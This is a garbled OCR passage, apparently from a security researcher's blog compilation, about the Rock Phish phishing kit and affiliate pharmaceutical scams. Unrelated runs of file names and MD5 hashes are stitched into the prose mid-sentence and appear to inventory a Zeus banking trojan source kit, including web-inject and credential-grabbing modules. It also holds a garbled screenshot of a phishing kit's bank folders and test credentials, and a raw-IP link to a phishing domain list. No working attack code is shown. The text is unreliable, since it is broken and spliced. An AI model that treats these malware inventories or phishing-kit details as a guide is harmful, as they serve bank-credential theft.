Meanwhile, there’s still a lot of confusion going on about what exactly Rock Phish is, and as 
you can see in this article, it’s [9]wrongly implied that it’s some sort of a phisher’s group : 
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d899f28afbb3c3e53145159f4e89509e 
sys _options.php 
93ee1f1c42fd015a4241c9a099122b5f 
sys _user.Ing.en.php 
€296c019b6ce0cdda9591827b3fbc805 
sys _user.Ing.ru.php 
c97b04fb8536046e89ef6dd97897ae3e 
sys _user.php 
f40349a2af854ff6375fd7f9d671f32F 
sys _users.Ing.en.php 
8005ab6ea7ac69a90546d81b47750147 
sys _users.Ing.ru.php 
f591a9312b8a555485a9caac3d42c466 
sys _users.php 
01562d6f5f7c8dae83bb281705f4a526 
failed.png 
21f1f21ed98476418255eed8eba64c9a 
footer.html 
9930a6f5b310ee74d9355ffa7aa0d4be 
header.html 
d84db18b21d515e8aefc69a0a9c7c677 
index.php 
9f5a33bbc823619215ddd5db58dd70e7 
popupmenu.js 
c87ac7a25168df49a64564afb04dc961 
small.html 
4a37792461cfe27187b5d9f9a29ae43c 
style.css 
a912a3fa604b8718a45df6afb99896cb 
throbber.gif 
dc3faf74ac38ef0486178b9869c5b4da 
config. ini 
81216c9a6c51c269f724283b85a8e3b5 
make.cmd c258d56294da636b17fe2159db5e25e6 
make _debug.cmd 
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a5ae79527637855fc1lbc721fb46b3c2f 
make _default.cmd 
15b8dfc04197c97d08c4f4dfa3le55ab 
make _full.cmd 
9db22d478d93eeb024d9134d5902ec41 
manual _en.html 
3e31acd79d12ab1969a29568e23edf78 
manual _ru.html 
ae3eb511467164a82d3b78ef0be586f7 
README.txt 
2d429e53124a7cce08c34b6a8f1d1d08 
VNC.txt 
d266136fdeb8daaa56f92ee963689ccf 
zeus.sin 645a7b7a313cc8bb7b53e87addbldfce 
zeus.suo 03d5e68541658f7dc10d9866ff0Of03F7 
7z.exe 
a51d90f2f9394f5ea0a3acae3bd2b219 
bt.exe 
c34bb49e499d795c0c6d5a0d81b5de73 
FASM.EXE db471fb99317c367f81fa0d4d89debf3 
upx.exe 
€905348c926ced2d25ef478726ec10a7 
php.exe 
4b2db8d878545cf40a9cdc30alc66bes 
php.ini 
€9651324113fd28550576a438d8ade02 
php5ts.dll 
€0670b06c60222fa371b03893305f86a 
php _gmp.dll 
44bc9644e9f87f6db6a51a5681f99a31 
php _mbstring.dll 
8440867fa945837094a4494b9334f559 
php _sockets.dll 
de678c1262dc532cbf65ab3a6c047efb 
config 
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2121550a3adcb2d9ac456eeac02e43bd 
config 
c7ac30568c7fe937b311e4f6a2bc54b0 
config 
fbe4f2869c117a54075b95911ddd997d 
config 
56bddb91af3ed11402131e13638f7c37 
convert maxmind _country.php 
f1d1a16513d273e228bace59bb7cdd48 
country[maxmind].txt 
46df69a6d67ab725b642f9f19c47e299 
GeolPCountryWhois.csv 
53aad16dd85b748a046e4f0aa42a2725 


imnact.h f78febfde83c028f864f532e82fa037d 


iregexp2.h 
37f1c702d9dbele0b48e74d4e1f4aa96 
mimeole.h 
054e2597962f0b8798e92d91aaad4d20 
msoeapi.h 
ddd5d59bc8590176d4fb8035f7db0ab0 
keysymdef.h 
c6074313234cc0b5716e8b47b2aab848 
Ide32.lib 
32e9daf7e5e4025ced7f4f70a598ae61 
ntdll.lib 
fd2d300fd8fa9b9c3634dd9028748d95 
Ide64.lib 
93d7f24856d15cf6d59eeb47bb7425f0 
ntdll.lib 
75c32b994416ac19bb56b944f02f361e 
baseconfig.inc.php 
b9b6c844a4388de0493d1e36e82b992d 
buildconfig.inc.php 
cfa4f7ac68e94939e7931a45d4f0eaa4 


configsample.inc.php 
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f687699eb6d5c2228c40b713ec182a83 
installdata.inc.php 
e6e62a9ed9bcdc2ac2a347ee523e14b8 
make.php 9245115a9e4906f2e6d46b125cdd5ebc 
make.vcxproj 
91cf9e531a9dfObaa4dc4ff5ac47b218 
make.vcxproj.user 
02816bcclda4abf7ab716035d355eb7c 
tools.inc.php 
6eaf7b80997a9e77d01fc6834660cd0a 
config 
e9dc924f238fa6cc29465942875fesf0 
config.txt 
cbhac460229d02267144f1c45c84a3a96 
webinjects.txt 
798f654ef8af8db3c44355d4bfda9ee4 
redir.php 
13afe10566f6918d02d076fc28196ec1 
sockslist.php 
d7160bb8a1le244d8fa8584088fe60a64 
cp.php 
4f092a3993c30c0f152e9ce5e888a8bd 
index.php 

geobase.txt 
46df69a6d67ab725b642f9f19c47e299 
index.php 
b18dcf2bde6a49a3f2d5c6d9446dd979 
.htaccess 
183e8e4abc660eaba3c3da4bb82b0bcf 
botnet _bots.Ing.en.php 
ec349a745ab7377e0b1cf2fde5070355 
botnet _bots.Ing.ru.php 
017c53fc1919794c21801f279f155406 
botnet _scripts.Ing.en.php 
f6f7dd4640db87d849fcae084cbef02f 
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botnet _scripts.Ing.ru.php 
826920ee5df54d0dd6b991611b203380 
fsarc.php 
5961441edf6éda9bd218f1d84c8a8422e 
global.php 
cc7aa716f091def7ba4ccc4114ba20e7 
index.php 

jabberclass.php 
d46ea7e0d9a60101c4d713c81bd6bf01 
Ing.en.php 
f0946e19307613b2e6e56e93bea22a63 
Ing.ru.php 
653f677acc91009d3128c8cb0bd4c43d 
reports db.Ing.en.php 
775df9bde4761bc29c19ea11e558d597 
reports _db.Ing.ru.php 
7f53a36e28d8c5cacca5d32935599b07 
reports _files.Ing.en.php 
aaaelf41d9d02df177c973a015b8ccca 
reports _files.Ing.ru.php 
35b9bdc91f40d8ade44fb9c84b3616d5 
reports _jn.lIng.en.php 
4509dad4502d80dd4c65ef95ef74b715 
reports _jn.Ing.ru.php 
b4535923384a8a39ec9475db7f86bdb1 
reports _jn.php 
03cd43dd61b907d05cda58c69e08ee9f 
stats _main.Ing.en.php 
a15f315569ed8227d0855c62194fac63 
stats _main.Ing.ru.php 
67e3089776d058716213bee0ccab6ed14 
stats main.php 
a83b4bf2ecbd81651b52c25b1c09d922 
stats _os.Ing.en.php 
2ba8b0a8548b40a42aa8cc6a4292Ff17b 
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stats _os.Ing.ru.php 
961bdcb842a5ea58fe0659f480c90546 
stats _os.php 
7f5ela4dlaba26e790aalffc8905f7fe 
sys _info.Ing.en.php 
6bc3d4aaa2156laefdba7aefl43eleba 
sys _info.Ing.ru.php 
6e€3448b812e8316f40c23552fef568ad 
sys _info.php 
fc4a72637224a4a73d783090d018a942 
sys _options.Ing.en.php 
0e0calb2857f25066e04c583451e5456 
sys _options.Ing.ru.php 
d899f28afbb3c3e53145159f4e89509e 
sys _options.php 
93ee1f1c42fd015a4241c9a099122b5f 
sys _user.Ing.en.php 
€296c019b6ce0cdda9591827b3fbc805 
sys _user.Ing.ru.php 
c97b04fb8536046e89ef6dd97897ae3e 
sys _user.php 
f40349a2af854ff6375fd7f9d671f32F 
sys _users.Ing.en.php 
8005ab6ea7ac69a90546d81b47750147 
sys _users.Ing.ru.php 
f591a9312b8a555485a9caac3d42c466 
sys _users.php 
01562d6f5f7c8dae83bb281705f4a526 
failed.png 
21f1f21ed98476418255eed8ebab64c9a 
footer.html 
9930a6f5b310ee74d9355ffa7aa0d4be 
header.html 
d84db18b21d515e8aefc69a0a9c7c677 
index.php 

10948 


9f5a33bbc823619215ddd5db58dd70e7 
popupmenu.js 
c87ac7a25168df49a64564afb04dc961 
small.html 
4a37792461cfe27187b5d9f9a29ae43c 
style.css 
a912a3fa604b8718a45df6afb99896cb 
throbber.gif 
dc3faf74ac38ef0486178b9869c5b4da 
bcserver.vcxproj 
00d0c7a7elffeb0719433be4fb017250 
bcserver.vcxproj.user 
02816bcclda4abf7ab716035d355eb7c 
common.cpp 
b4adb2bbeal1917a78e7200aa8aae3377 


core.cpp 9f90caf696fe9987642e3b8139ed43c9 


core.h 
dfab8c8aee71d3fb37da93d58fa42946 
defines.h 
debe2ee78d00fee989760a31fc323492 
language.h 
41a55bea6df913cab5933f57857ac236 
listen.cpp 
389f16b0d4e674315e8cb06113992175 
buildbot.cpp 
b9ad0098dbb82ca8baf26f83b6b5900a 
buildbot.h 
10ce5ca69fec3e4af7321e17e2539ae2 
buildconfig.cpp 
d12d3471516fc239dc9abff7ad810847 
buildconfig.h 
1609b9af7fc416b28f0fdad167e09595 
builder.cpp 
66a2bbf06c829c632e6eb14890c75e70 


builder.vcxproj 


10949 


fd813cf69487cOdfda93e0f6212d860d 
builder.vcxproj.user 
02816bcclda4abf7ab716035d355eb7c 
clients.h 
e2dee2428cce4a92283ea1fb5353fb61 
common.cpp 
cab098589971f787f875d2fc9e0b2ffe 
defines.h 
cd1f3e26fd6167331cedc5f5b91la2a6b 
info.cpp b2a072f7db87691a1452caf5e901ea2f 
languages.cpp 
55b194b5fe3d0f53e8db787cfbaa9 laf 
languages.h 
d0a0c0d2358e2dc62b68bfae07834d69 
main.cpp O04ac5ba4f32ceb979e8ba3336833e673 
main.h 
384b1aad46d34d528d51374472f35764 
settings.cpp 
8603b40fd29fe52c6dd1f81c9874e766 
tools.cpp 
71bfe5af98cde2blac051dalfc619ef8 
tools.h 
996fa34a2dcefdfdb3681f072b4b2cf0 
cuimanifest.xml 

3347667 1faef21882bb614d209ec552d 
guimanifest.xml 
3f97886368de146fad9f64578a61a915 
main.ico 1d2e10317c7a479afd38ae264130c0c1 
main[original].ico 
3decd4e9acbc3a9a26c8881eb40e57e7 
resources.aps 
e€69b766d82e861f36ea964d3be3e42af 
resources.h 
83d945911c27be6edd7c4a8fe73b4411 
resources.rc 

10950 


O08efb8c733dafd6dd3b87032ed58f7ed 
buildtools.vcxproj 
9lac7fa28da63ecaa0e6d71463ef8c04 
buildtools.vcxproj.user 
02816bcclda4abf7ab716035d355eb7c 
common.cpp 
d0539468eb443b804dflbbc657c40888 
core.cpp 83cf8b8378e1424f688d0cbe6b25dae6 
core.h 
915862c70e302a36e04f668805d8ab3b 
defines.h 
13f6504f98543cf5512e20a48102cfa9 
language.h 
6130d1799c8af243b0a3a6d96df09a24 
peinfo.cpp 
2bdd5e31f3f35f6f6éde0e02cea471b99 
rorl3.cpp 
73efcd91d6a9f469e8f100f2a6d453b9 
backconnectbot.cpp 
ea9d1f8636a2d3167648e9b2chbdf3tcf 
backconnectbot.h 
5ff577eabba430bdb8d98e34b2920237 
certstorehook.cpp 
27ddaalfd5f73aa79df69c0aad204074 
certstorehook.h 
15749eecdabfa701173a802b96c4c67e 
client.vcxproj 
57f4f4719582661665f093cd85fdOlla 
client.vcxproj.user 
02816bcclda4abf7ab716035d355eb7c 
common.cpp 
323bb2fe01a49d774797c637abféabff 
core.cpp ba4f6282ce81a9a12bc099a5a9a059b4 
core.h 


aad0b119acc94d8f33f186e3e1d729c6 
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corecontrol.cpp 
7e€284934c300ec5ae0ea5565f476448e 
corecontrol.h 
a627850f5970f3c6056cf2d84e823e85 
corehook.cpp 
2165db9e1562219ff7e435551leaae305 
corehook.h 
cOf8b27062a7ca47a08a03085af82d2c 
coreinject.cpp 
440758601049776bc43355d0143f85a0 
coreinject.h 
6ff68d90c662bbea7e4d5cel7d67e707 
coreinstall.cpp 
1363c936440ff4c7e43ace5917cfe06b 
coreinstall.h 
fb333431f679ebfaa5f21e98d34dfeld 
cryptedstrings.cpp 
7008da05e4da35489711882c486d8dea 
cryptedstrings.h 
d25566f91944c9a846e1c68dc719e328 
cryptedstrings.txt 
33e73f9dfaffobbaeae86e775a91f19fe 
defines.h 
441336bc0d4b8a6789b2739f8d7e7dd5 
dynamicconfig.cpp 
95e91c204a09183b0eae46d09fedaf4b 
dynamicconfig.h 
b7d4299321e1393f3438956940dceeac 
filesearch.cpp 
d756eec072398bae8b298d352c02bacl1 
filesearch.h 
faa676d9f5760a39d623d877cf9de128 
httpgrabber.cpp 
0464cb4f4bf60b53b6576eacaaf81cbb 
httpgrabber.h 
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"Nobody knows exactly who or what Rock Phish are - whether it’s one person or a group of 
people - but security researchers believe Rock Phish is behind as many as half of all phishing 
attacks on the Web. Fast flux is a method by which a domain name that phishers use has 
multiple IP addresses assigned to it. The phishers switch those domains quickly between the 
addresses so that it’s not as easy to find or shut down the phishing sites." 


[1O]Jand another one: 


"Of particular concern is an increase in “rock phishing,” originated by the Rock Phish Gang 
based in Eastern Europe. Rock phishers use stolen information to register and rapidly cycle 
through domain names and IP addresses. They obscure their origin with botnets, which auto- 
mate unwitting consumers’ computers to send out spam." 


> + 
(€O-« le _— httpWlogin internetbankingzone biz (¢> > ia a iMtp:Aogin intemetankingzone. bid CamaPenedes/data bt 
Name Last moayrrea 
Codi de client i nom d'usuari: 4132 
on Clau d'entrada: 4132 
£5 Barclays/ 21-Oct-2005 11:21 Security: 1432 
OP ceixsPonodes eit nneeieented, || Jssbandaesidanenisusecnawnbenaseens 
Q Codi de client 1 nom d'usuari: test 
epnl/ Ol-Mar-2006 15:17 Clau d'entrada: test 
alliance-leicester/ 03-Mar-2006 11:05 Security: test 
@ bankofcyprus/ 08-Nov-2005 05:32 | Codi de client i nom d'usuari: pepito 
6 hankafacdt)and/ 03-Mar-2006 11:09 Clau d'entrada: pepito 
le Security: pepito 
banorte/ GE-Marsmooe GesS2 | asec ccieenaninapbiasebtapeavaseace 
) biubanks ete 44 Codi de client i nom d'usuari: sd234S5 
me Lghapes 28+ Ont 200506 Clau d'entrada: 122455 
ed Cahoot/ 31-May-2005 12:50 Security: 13345 
: ‘ -Mar- : PEt ERIS Se a ee aT RS came a ‘ ; 
= c¢_bank/ BO: ARE: EU: 2OrS8 Codi de client i nom d'usuari: jejeje... nadie pica! 
© commanks 09-Feb-2005 04:52 | Clau d'entrada: dddddddddddd 
credem/ nidcammee saan: | ee cs re 
0 creyal/ 28-Oct-2005 09:08 Codi de client 1 nom d'usuari: test 
(5 Clau d'entrada: test 
=) data, txt 03-Mar-2006 11:08 | security: test 
6 ¢ = 03-Mar-2005 11:09 wtntee ener rete reeset tce reer ree eees 
Q Codi de client i nom d'usuari: pepito 
faneco/ 17-Jul-2005 11:14 Clau d'entrada: pepito 
© gruppocarige/ 29-Oct-2005 09:44 Security: pepito 
hala fax 03-Mar-2006 11:10 Codi de client 1 nom d'usuari: sd2345 
veils 12-Jan-2006 14:10 Clau d'entrada: 122455 
Security: 13345 
am Lloyds/ GS-Nov-2AOS.TIsGS, || ccadecinmcwasanaascamencs'semaewamnes 
: Codi de client i nom d'usuari: jejeje... nadie picat 
-M . 2 
natiocwade/ 02-Mar-2008 21520 | Clau d'entrada: dddddddddddd 
ed nwolb/s 23-Oct-2005 06:59 Security: dddddddddddd 
a postbank/ 09-Mar-2006 21:44 
c nk 27-Oct-2005 11:59 
rbsdigital/ 03-Mar-2006 11:10 
santander/ 26-Feb-2006 02:10 
© scotiabank/ 26-Feb-2006 00:12 
credit 15-Sep-2005 13:27 
3 woolwich/ 17-Oct-2005 11:17 


In reality, [11]Rock Phish is a script taking advantage of the now commoditized phishing pages 
of each and every web property and company that is a potential victim, hosted on a single 
domain in order to achieve efficiency. Once the script and the phishing pages are in the wild, 
the entry barriers into phishing scams become significantly lower allowing novice phishers to 
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f7357aea5196eecf92c69c30cal7b70d 
localconfig.cpp 
27e30bc2776187eaee3b1fb1974e5979 
localconfig.h 
a197970a380aa5cadfe4aldfb82aa23d 
localsettings.cpp 
78197f503541b8db731e749c383d837 
localsettings.h 
25a71cldab5cb8a0a4e5dc53addf7e57 
nspr4hook.cpp 
968c69c5fed7baf6f94ffc7cabadd965 
nspr4hook.h 
dcc9f55af1649d30787504ec99e11976 
osenv.cpp 
c89c8ba039b8be21cd34b39c716da312 
osenv.h 
Od3ada939bb69eb8a88203ad2296bd22 
remotescript.cpp 
3406fb70e06a55e0d97b06a0f3c95b75 
remotescript.h 
46f1d9048b625a6578b32a96394cfb8a 
report.cpp 
446fd5e664c85b4ae04ef8328921f09F 
report.h 44e762caf75db88c3f17d38e28590365 
screenshot.cpp 
236a31359d06db20c859cbcf1f2df06b 
screenshot.h 
19c2a69e6dd70c6579d77dalc7ae9cf7 
sockethook.cpp 
37b80320e2ec4d32a0eea01fb4036c24 
sockethook.h 
e0dc2e5159386761c4073963901d4df9 
socks5server.cpp 
16d04d1b95d5337f6b8ced4flcbe5dd3 


socks5server.h 
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75e213ad26c5b2114e7 6f8c379c9e4bf 
softwaregrabber.cpp 
ad7f9aa546069d6f09280db681f14d3e 
softwaregrabber.h 
f1916b2eaa7572fa9b8ce12424be800b 
tcpserver.cpp 
5dfaeaa21c36a9b65d3c45ee2939de48 
tcpserver.h 
3ce95e70cfc942b9f8b738478fafc756 
userhook.cpp 
604bdb544eb20d301424ecf41a80393b 
userhook.h 
8ea556ede5f0f65a72d643e29ce0ba91 
winapitables.cpp 
804b0254b649c3911f2dad05f0df9ea4 
winapitables.h 
e7f3b06eab5e22e11cdbf3e8e95cece9 
windowstation.cpp 
8f80ed0e7cc7879624930bdc2a7b89a5 
windowstation.h 
f456b51cbdc88575f75671ec98f86687 
wininethook.cpp 
3e929ce256d0db3d97d6275fba24a7a2 
wininethook.h 
1d46a05bbc42b10823a6140e15bf830c 
defines.h 
304ffef286c6bc9428d1b6ae8ab6dc69 
rfb.cpp 
566769c6c6492abda4609538a30800d8 
rfb.h 
92f0b0090f0d8dcff795a6421b490b10 
vnckeyboard.cpp 
f10785f27be80d252ed77e262317375a 
vncmouse.cpp 


0b7808635e2228d6ef2ff933665e5aff 
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vncpaint.cpp 
d32dfd483dfde22795c02cfa78302a23 
vncserver.cpp 
e33e76ae7299b9dc12f1a43ef735383a 
vncserver.h 
c7d7e3e87b772895b80c0a714491a7f5 
backconnect.cpp 
a27327eeb6a92efaalbde84447c95bbd 
backconnect.h 
99550b014f85b837b15aba37fb166778 
baseoverlay.cpp 
44817b1d47d3d6f96ff1603f3972f28e 
baseoverlay.h 
d667a3009b6ada6c8312bcdffd463ef7 
binstorage.cpp 
c33c4e245d3f16750878a6db293673a7 
binstorage.h 
4e0735a001fd8ecdcbf6eb581c8ae2c4 
botstatus.h 
d557798a96afa5e35ff8ec2559bde5c5 
comlibrary.cpp 
9a3be69e3270b4f1f35044ae9a4e5e01 
comlibrary.h 
61595e03b7eaf0b7fle9badcf44f0d86 
common.vcxproj 
5299405e06ac9437654ddb602cc1532a 
common.vcxproj.user 
02816bcclda4abf7ab716035d355eb7c 
config.h 36d4ac39cf7dd9ed03741fdcbc14ba86 
configO.cpp 
768bd005cae8347f78ad809d4cf760e9 
configO.h 
c315a999605f10713e9e8742867d55d6 
configl.cpp 
e1c49cb6cf14c45da26a82edc26a3325 
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configl.h 
b8b3fe1300417645b4f147eab757f740 
console.cpp 
292826f80fec7220a5af74e7cd209f79 
console.h 
9ae456324919a8889d3543d8104811c4 
crypt.cpp 
a504369c9160b9b7b6e49ef6f6c50176 
crypt.h 
7a15bb678928b2532dbf4308b92fc08c 
cui.cpp 
b00540cbb69b8d8ab73a33555a30b3e7 
cui.h 
5fbaecf5ee778f5c3ddddadf73094009 
cuifen].h 
21cc4e5434710cbb97a8fdef58b5455e 
debug.cpp 
1bf5e160237db4a80423757f2ffea57d 
debug.h 
3713429d0f5b6dd70892e2b83fa61346 
defines.h 
568b2661948f8946e18c62332f0d5164 
defines.php 
a7d50eb92a8500adef6e4e5a96b6905c 
disasm.cpp 
cf010872f872edd9c19dbcec32b7393c 
disasm.h c6a28d4f8572fcd3ee39e1a57ec56564 
fs.cpp 
256c8450d4e383aebaec6c8b91d87744 
fs.h 
477e753c767c431067def29217a69ala 
gdi.cpp 
5caa87d6b21726e08ab79a477966429d 
gdi.h 
fd59ceb323fd461473a81727d5386438 
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generateddata.h 
9c434bae43313f3e53a9710adc4fe41b 
gui.cpp 
0b9f644403979717721a68ea3d9285f4 
gui.h 
9da95b1667ad1f0c633b357697db3449 
httpinject.cpp 
e6b0c584c4b3al1fa4b2b100708466a81 
httpinject.h 
f48628855d0e2d2539f5a4bc18a3abb3 
httptools.cpp 
f909b709e13e0f3cal3ee7558dclcbe4 
httptools.h 
a7cafd82e29e871d96e51d4d782ba7a8 
malwaretools.cpp 
ff7f1274aa795d62fad5700094495a0f 
malwaretools.h 
da8417a7ffe4480e6258f48d69ddbe2b 
math.cpp c3cadc41635bee296589d9357f50f61c 
math.h 
41ad69786dff2a9bfaaa3c2825c8bb73 
mem.cpp 
b3f7e94c585c9000977819733096c113 
mem.h 
68306e38eccb45f34d9b05c1e2032b64 
mscab.cpp 
a4c1a02e938e8d216def8bd3436ce9c3 
mscab.h 
7f8deed7d4b01710556c492f892d397b 
ntdll.h 
c4b8e2dd0c78728526cf3a37a4eade08 
peimage.cpp 
089b8c0707d2e3f7ae26a29c9c2eccbb 
peimage.h 
€6424a09bd072e963bec6db04c5ff9d3 
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process.cpp 
4f3f0a24d33082c8cdcab66ddf10falc 

process.h 

035ffc1f57ba095fe74d9f99aebecd5d 
registry.cpp 
dc41c5e3a3826e561f1848c11ca33046 
registry.h 
9630dee08aec4dcdf24da9fb91218074 
sslsocket.cpp 
56f0200e3fbe293c8e8334fd5b242227 
sslsocket.h 
4b6bc4c7a933c70fa0eb3a2494f2a542 

str.cpp 

f96d2f586f6baldcc93274aaca9a513d 

str.h 

d4e60d51d8bb7e22204547139c59368e 
sync.cpp a9d5e5982046df30dcf67e328e0fc70a 
sync.h 

d6c41c787bcb0f27516d47aaf5f2d7b6 
threadsgroup.cpp 
0d41f8b75d551a358535fa8ff8c8fsf5 
threadsgroup.h 
02880445b7feb8c4c0522bc3b864ce05 
time.cpp bO8bc79eef99c1b5c1f78a8dfc8d1b2b 
time.h 

d587614f6bd4f89f20c78e9098de7919 

ucl.cpp 

4ea9alaba9adbf4ab549e5e5871ed5dcf 

ucl.h 

b159d0cfee213a3ef596861f2ec9ee79 
wahook.cpp 
b08abc2752042508170d5eb2a6bdb44e 
wahook.h 5d76a3ed876ca34a3ad6736c12fa6b2f 
wininet.cpp 
4a5b5ef8cbc04a4dcc3570219e4bcda3 
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wininet.h 
3e1b17f0b3edf8029ac6a41ce9f258e6 
winsecurity.cpp 
2e870ca70a56d152531187562c45e9b1 
winsecurity.h 
bcb754b84bc928dae2d3598e83150527 
wsocket.cpp 
da450039d594bd04f6083a77dc688cc9 
wsocket.h 
f05c9249c2dd18f20394543527c4f273 
xmlparser.cpp 
48213ae1b3dda70370779078b4ccee33 
xmlparser.h 
bcd9dfb7ab4b0864b1cb8397bd87dea2 
redir.php 
13afe10566f6918d02d076fc28196ec1 
sockslist.php 
d7160bb8a1e244d8fa8584088fe60a64 
webinjects.txt 
798f654ef8af8db3c44355d4bfda9ee4 
zip.exe 
83af340778e7c353b9a2d2a788c3al1l3a 
bankofamerica.txt 
2356b26a28a98208bc168b422b680898 
paypal.txt 
78d3651983aad1c8f17fcae9be208db7 
usaa.txt fad49c53dd9cc3ff88882a09042f973d 
cp.php 
7195bcf9d531c56d8cc42af0c4eecb56 
index.php 

server.vcxproj 
6b43deda769b86ae5e5c182al2cce8e5 
server.vcxproj.user 
02816bcclda4abf7ab716035d355eb7c 
index.php 
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eb54d6e727be0e34ac5005aaf3d9d69e 
«htaccess 
183e8e4abc660eaba3c3da4bb82bO0bcf 
botnet _bots.Ing.en.php 
ec349a745ab7377e0b1cf2fde5070355 
botnet _bots.Ing.ru.php 
017c53fc1919794c21801f279f155406 
botnet _scripts.Ing.en.php 
fof7dd4640db87d849fcae084cbef02f 
botnet _scripts.Ing.ru.php 
826920ee5df54d0dd6b991611b203380 
fsarc.php 
5961441edf6éda9bd218f1d84c8a8422e 
global.php 
52ef1818d9bd2043fd5e72efabd8ecd0 
index.php 

jabberclass.php 
d46ea7e0d9a60101c4d713c81bd6bf01 
Ing.en.php 
aa8cb85eb071728c9f1251325b298bd7 
Ing.ru.php 
d1fc50cf2be114d974cf2f9631f4d6c7 
reports db.Ing.en.php 
775df9bde4761bc29c19ea11e558d597 
reports db.Ing.ru.php 
7f53a36e28d8c5cacca5d32935599b07 
reports _files.Ing.en.php 
aaaelf41d9d02df177c973a015b8ccca 
reports _files.Ing.ru.php 
35b9bdc91f40d8ade44fb9c84b3616d5 
reports _jn.Ing.en.php 
4509dad4502d80dd4c65ef95ef74b715 
reports _jn.Ing.ru.php 
b4535923384a8a39ec9475db7f86bdb1 
reports _jn.php 
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03cd43dd61b907d05cda58c69e08ee Sf 
stats _main.Ing.en.php 
a15f315569ed8227d0855c62194fac63 
stats _main.Ing.ru.php 
67e3089776d058716213bee0ccab6ed14 
stats _main.php 
a83b4bf2ecbd81651b52c25b1c09d922 
stats _os.Ing.en.php 
2ba8b0a8548b40a42aa8cc6a4292Ff17b 
stats _os.Ing.ru.php 
961bdcb842a5ea58fe0659f480c90546 
stats _os.php 
7f5el1a4dlaba26e790aalffc8905f7fe 
sys _info.Ing.en.php 
6bc3d4aaa2156laefdba7aefl43eleba 
sys _info.Ing.ru.php 
6e€3448b812e8316f40c23552fef568ad 
sys _info.php 
fc4a72637224a4a73d783090d018a942 
sys _options.Ing.en.php 
0e0calb2857f25066e04c583451e5456 
sys _options.Ing.ru.php 
d899f28afbb3c3e53145159f4e89509e 
sys _options.php 
93ee1f1c42fd015a4241c9a099122b5f 
sys _user.Ing.en.php 
e€296c019b6ce0cdda9591827b3fbc805 
sys _user.Ing.ru.php 
c97b04fb8536046e89ef6dd97897ae3e 
sys _user.php 
f40349a2af854ff6375fd7f9d671f32F 
sys _users.Ing.en.php 
8005ab6ea7ac69a90546d81b47750147 
sys _users.Ing.ru.php 
f591a9312b8a555485a9caac3d42c466 
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sys _users.php 
01562d6f5f7c8dae83bb281705f4a526 
failed.png 
21f1f21ed98476418255eed8ebab64c9a 
footer.html 
9930a6f5b310ee74d9355ffa7aa0d4be 
header.html 
d84db18b21d515e8aefc69a0a9c7c677 
index.php 
9f5a33bbc823619215ddd5db58dd70e7 
popupmenu.js 
c87ac7a25168df49a64564afb04dc961 
small.html 
4a37792461cfe27187b5d9f9a29ae43c 
style.css 
a912a3fa604b8718a45df6afb99896cb 
throbber.gif 
dc3faf74ac38ef0486178b9869c5b4da 
bcserver.map 
17bledb68a6d8f8109d59eeb5c1ff788 
common.obj 
a514f33803974d722545d6c32c75750b 
core.obj 33da991cbe9903d84d49b6ce7dbe36cf 
listen.obj 
3ec501ea0d03c14f63f2479f8b4b58be 
O.res 
c3eb7a5c134d6014ac426b345ca7c0d4 
buildbot.obj 
d3efe2fad602753e8afd7b71cfefc752 
buildconfig.obj 
2a992066cccd6d9cb4f8617e969ea8el 
builder.map 
ce093cba8bfd42152662a5calfa5d4fa 
builder.obj 
f38d744cd17e9da5cd556cf4b7e31d8f 
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easily launch what used to a professional phishing campaign much easier than ever. 
[12]Why give the kid a phish, when you can teach them to phish? 


http: //ddanchev. blogspot .com/2007/09/209-host- locked. htm 
. http: //ddanchev.blogspot.com/2007/07/confirm-your-gullibility.htm 


http: //ddanchev.blogspot .com/2007/09/paypal-and-ebay-phishing-domains.htm 


http: //ddanchev. blogspot .com/2007/07/average-online-time-for-phishing-sites .htm 

http: //ddanchev.blogspot .com/2007/09/diy-phishing-kit-goes-20.htm 

http: //www.mooload.com/new/file.php?file=file01/081007/1191850172/rock_phish_domains .txt&s=t 
http://195.210.38.41:2082/fi1e01/081007/1191850172/rock_phish_domains.txt 

http: //www.infoworld.com/article/07/10/04/Rock-Phish-using-fast-flux-phishing-attacks_1.htm 


10. http://www. redherring . com/Home/22604 


11. http://www.dslreports.com/forum/r18762644-Rock- phish-information-continued~start=60 
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12. http://securitymike .blogspot.com/2007/10/teaching-how-to-phish. htm 


3.10.7 Incentives Model for Pharmaceutical Scams (2007-10-10 13:17) 


Be ee 2 oe Se a Yous HAN OS 


Tr ~ Ss ae. 
mer. WEE) «hn 


New pharmacy shop. Lots of products. HOT RATIO! 
NO 180-days 10% hold anymore! 


From now on it's 45% YOURS! 


We proud! 
Gudhnes that ts our 5: 
anniversary now! 


We hold it an honour \ 
working with you » 


a Lee Pawvecud 

TI | } 
J 
A Support ICY 


demaiies | chats | tec | bee sp sas! | lok 


Sometimes, it’s unbelievable how easy is in fact to social engineer people on their way to 
"make a deal" online, especially when buying pharmaceuticals online. Let’s discuss organized 
pharmaceutical scams the way | perceive them, which like phishing also aim at reaching the 
efficiency level. 
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common.obj 
898d2beb908e884d336c525e8962cbdc 
info.obj b51a9291ae4783206ed857916e89d068 
languages.obj 
210ffcfc62e79994b54edc28004b85b8 
main.obj 67c295bfc87e557bbf4573fa7f708e2d 
settings.obj 
d25a807c285072066ladO0adf69cb9e3a 
tools.obj 
4399a853fleala3dbebc4bd868239f9b 
backconnectbot.obj 
71e64ec9c84d839d7319160bfad9 1 fff 
certstorehook.obj 
e6c9cd649998b8f65fb183Ff768882cb9 
client.map 
2£751001392d872345bee0fal5a652e0 
common.obj 
694285bf04005532c2b8a0da92flc62e 
core.obj 9af301f54c1206e513662cd8f10138c2 
corecontrol.obj 
ba0ee043cc84f7304ee93f20fd9cb379 
corehook.obj 
f93e045512ac95526baf6e60abcd4afd 
coreinject.obj 
205bb7dee517566c5d07c4dc820cal6c 
coreinstall.obj 

63f6de992ea057cb4f6d 755231833385 
cryptedstrings.obj 
f9d199c888da69f4d6f37abd553dd346 
dynamicconfig.obj 
015b5c2639ad9afea541ec5b6ef6f78b9 
filesearch.obj 
Oabfa71ca979a60b41flafb11f06b844 
httpgrabber.obj 
9e407e828c6efff6501d0b67478dfeéf 
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localconfig.obj 
75533e8a27f2106d4b04fb3c49aee463 
localsettings.obj 
867abb2e09fd82b3c27fbef8575blade 
nspr4hook.obj 
743cd7202ce727b24c56cf1l1d77e2274 
osenv.obj 
0e5abe1257d95564324c332b2be9dcc7 
remotescript.obj 
62ef65c22883995888b32b31ee334ec4 
report.obj 
d05b9dc3837beeea3c5851bbc2a5ea4f 
rfb.obj 
dc32fd7b0c16689d8efb0a190d314c17 
screenshot.obj 
cccef452bf5864f2710ff954652066b3 
sockethook.obj 
d005a37cela469e6f5f87f6c631f3db7 
